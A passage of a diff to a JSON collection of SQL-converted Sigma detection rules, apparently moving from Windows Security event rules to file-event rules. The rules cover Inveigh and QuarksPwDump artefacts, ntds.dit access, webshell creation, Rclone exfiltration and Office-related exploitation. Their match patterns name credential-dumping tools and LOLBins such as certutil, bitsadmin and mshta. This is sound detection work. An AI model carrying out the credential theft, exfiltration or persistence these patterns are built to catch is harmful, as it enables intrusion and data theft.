is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", - "status": "test", - "description": "This events that are generated when using the hacktool Ruler by Sensepost", - "author": "Florian Roth (Nextron Systems)", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + 
"description": "Detects the presence and execution of Inveigh via dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\')" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", - "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "title": "EVTX Created In Uncommon Location", + "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "status": "experimental", + "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. 
Which could indicate tampering with default evtx locations in order to evade security controls", + "author": "D3F7A5105", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Backup activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_create_evtx_non_common_locations.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", - "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs 
WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) 
AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (NewProcessName = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "status": "test", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' 
ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": "Thomas Patzke", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "title": "Suspicious PFX File Creation", + "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", + "description": "A general detection for processes creating PFX 
files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "System administrators managing certififcates." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_susp_pfx_file_creation.yml" }, { - "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", + "title": "Creation In User Word Startup Folder", + "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects the creation of an file in user Word Startup", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. 
(From elastic FP section)" + "Addition of legitimate plugins" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_office_winword_startup.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. 
Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Suspicious Word Cab File Write CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "status": "experimental", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Initial installation of a domain controller" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_susp_dsrm_password_change.yml" + "filename": "file_event_win_winword_cve_2021_40444.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1219" 
], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": "file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", - "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "status": "experimental", + "description": "This rule will monitor executable and script file creation by office applications. 
Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - "filename": "win_security_apt_wocao.yml" + 
"filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR 
TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects the creation of 
Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": "file_event_win_net_cli_artefact.yml" }, { - "title": "RottenPotato Like Attack Pattern", - "id": 
"16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects a dump file written by QuarksPwDump password dumper", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.credential_access", - "attack.t1557.001" + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" ], - "filename": "win_security_susp_rottenpotato.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for 